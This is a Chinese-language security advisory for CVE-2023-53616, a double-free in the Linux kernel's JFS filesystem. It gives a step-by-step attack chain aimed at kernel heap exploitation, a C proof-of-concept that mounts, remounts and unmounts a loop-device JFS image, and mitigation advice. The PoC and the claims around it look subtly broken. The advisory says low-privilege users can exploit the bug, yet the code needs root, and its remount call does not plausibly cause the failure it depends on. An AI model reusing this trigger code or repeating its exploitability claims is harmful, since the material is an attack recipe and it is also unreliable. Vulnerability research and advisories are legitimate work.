CVE-2023-53616 Linux内核JFS文件系统双重释放漏洞

漏洞信息

漏洞编号

CVE-2023-53616

漏洞类型

双重释放（Double Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel (JFS文件系统)

漏洞概述

CVE-2023-53616是Linux内核中JFS（Journaled File System）文件系统的一个高危安全漏洞，CVSS评分为7.8。该漏洞由syzbot模糊测试工具发现，位于fs/jfs/jfs_imap.c文件的diUnmount函数中。漏洞的根因在于JFS_IP(ipimap)->i_imap指针在释放后未被设置为NULL，导致在特定条件下发生双重释放（double-free）问题。当jfs_remount()函数释放了JFS_IP(ipimap)->i_imap指向的内存，但在后续的diMount()调用失败时，该指针仍然指向已释放的内存区域。当文件系统卸载（umount）操作再次执行diUnmount时，会再次尝试释放同一块内存，从而触发KASAN检测到的双重释放错误。此漏洞可被本地低权限用户利用，通过触发文件系统重新挂载失败并随后执行卸载操作，可能导致内核崩溃（拒绝服务）或进一步的内核内存破坏，对系统的机密性、完整性和可用性均产生高影响。

技术细节

该漏洞的技术原理如下：JFS文件系统使用ipimap结构来管理inode分配映射，其中i_imap字段指向动态分配的内存区域。在正常的文件系统卸载流程中，diUnmount函数负责释放该内存。但在异常路径上，当jfs_remount()成功释放了i_imap指向的内存后，如果后续的diMount()调用失败，代码路径会直接返回而不会重新分配i_imap。此时i_imap指针仍然保留着已释放内存的地址（悬空指针）。当用户随后执行umount操作时，diUnmount函数会再次检查并释放i_imap指向的内存，从而触发KASAN报告的双重释放错误（BUG: KASAN: double-free）。

从利用角度看，攻击者作为本地低权限用户，需要：1）挂载一个JFS文件系统；2）触发remount操作并使其在diMount阶段失败；3）执行umount操作触发diUnmount中的双重释放。这可以通过精心构造文件系统状态或利用其他内核缺陷导致diMount失败来实现。双重释放可能导致slab分配器的元数据损坏，进而被利用进行内核堆利用攻击，实现权限提升或任意代码执行。

修复方案是在diUnmount函数释放i_imap后立即将其设置为NULL，确保即使发生重复调用也不会再次释放已释放的内存。

攻击链分析

STEP 1

步骤1：创建JFS文件系统

攻击者创建一个JFS格式的文件系统镜像，并通过loop设备进行挂载。这需要本地文件系统操作权限。

STEP 2

步骤2：触发remount失败

通过执行带有特定参数的remount操作（如传入无效的挂载选项），使jfs_remount()函数释放i_imap内存后，在diMount()阶段失败返回。

STEP 3

步骤3：触发双重释放

当remount失败后，i_imap指针变为悬空指针。随后执行umount操作，diUnmount函数会再次尝试释放同一块内存，触发KASAN双重释放错误。

STEP 4

步骤4：利用内存破坏

双重释放导致slab分配器元数据损坏，攻击者可利用此漏洞进行内核堆利用，实现权限提升或拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53616 PoC - Trigger double-free in JFS diUnmount
// This PoC demonstrates triggering the double-free vulnerability
// by causing a remount failure followed by umount.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <fcntl.h>

#define LOOP_DEVICE "/dev/loop0"
#define MOUNT_POINT  "/mnt/jfs_test"
#define IMAGE_FILE   "/tmp/jfs_image.img"
#define IMAGE_SIZE   (100 * 1024 * 1024)  // 100MB

int main(int argc, char *argv[]) {
    int ret;

    // Step 1: Create a JFS filesystem image
    printf("[*] Creating JFS filesystem image...\n");
    int fd = open(IMAGE_FILE, O_CREAT | O_RDWR, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    ftruncate(fd, IMAGE_SIZE);
    close(fd);

    // Create JFS filesystem on the image
    ret = system("mkfs.jfs -f " IMAGE_FILE);
    if (ret != 0) {
        fprintf(stderr, "[-] mkfs.jfs failed\n");
        return 1;
    }

    // Step 2: Setup loop device
    printf("[*] Setting up loop device...\n");
    ret = system("losetup " LOOP_DEVICE " " IMAGE_FILE);
    if (ret != 0) {
        fprintf(stderr, "[-] losetup failed\n");
        return 1;
    }

    // Create mount point
    mkdir(MOUNT_POINT, 0755);

    // Step 3: Mount JFS filesystem
    printf("[*] Mounting JFS filesystem...\n");
    ret = mount(LOOP_DEVICE, MOUNT_POINT, "jfs", 0, NULL);
    if (ret != 0) {
        perror("mount");
        return 1;
    }

    // Step 4: Trigger remount with invalid options to cause diMount failure
    // This will free i_imap in jfs_remount() but fail at diMount()
    printf("[*] Triggering remount failure...\n");
    ret = mount(LOOP_DEVICE, MOUNT_POINT, "jfs", MS_REMOUNT | MS_RDONLY, "errors=panic");
    // The remount may fail at diMount stage, leaving i_imap as dangling pointer

    // Step 5: Unmount to trigger double-free in diUnmount
    printf("[*] Unmounting to trigger double-free...\n");
    sleep(1);
    ret = umount(MOUNT_POINT);
    if (ret != 0) {
        perror("umount");
    }

    // Cleanup
    system("losetup -d " LOOP_DEVICE);
    system("rm -rf " MOUNT_POINT " " IMAGE_FILE);

    printf("[*] Done. Check dmesg for KASAN double-free report.\n");
    return 0;
}

影响范围

Linux Kernel < 6.1 (受影响的稳定版本)

Linux Kernel 6.1.0-rc7 及之前版本

所有包含未修复jfs_imap.c的Linux内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统不使用JFS文件系统，可以通过在内核启动参数中添加`modprobe.blacklist=jfs`来禁用JFS模块加载；2）限制本地用户挂载文件系统的权限，确保只有特权用户才能执行mount/umount操作；3）监控系统日志，关注KASAN报告的双重释放错误，及时发现潜在的攻击尝试；4）使用SELinux或AppArmor等强制访问控制机制限制文件系统操作的权限。